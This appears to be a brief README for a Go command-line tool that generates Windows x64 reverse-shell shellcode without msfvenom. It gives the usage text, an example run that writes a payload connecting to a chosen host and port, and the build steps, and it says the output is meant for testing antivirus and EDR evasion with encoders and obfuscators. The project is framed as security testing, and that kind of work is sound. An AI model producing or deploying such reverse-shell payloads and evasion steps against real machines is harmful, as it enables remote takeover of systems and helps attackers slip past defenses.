msfvenom windows/x64/shell_reverse_tcp payload generator without dependencies
$ ./shell_reverse_tcp -h
Usage of ./shell_reverse_tcp:
-host string
Host IP address (default "127.0.0.1")
-port int
Port number (0-65535) (default 4444)
$ ./shell_reverse_tcp -host 192.168.100.100 -port 4444 > shellcode.bin
git clone https://github.com/nchgroup/shell_reverse_tcp
cd shell_reverse_tcp/
go build .
Generate your payload in x64 quickly and easily without dependencies to perform AV/EDR evasion tests on Windows in amd64, so you can use encoders, ciphers, obfuscators, whatever.
- add language support, example:
-lang c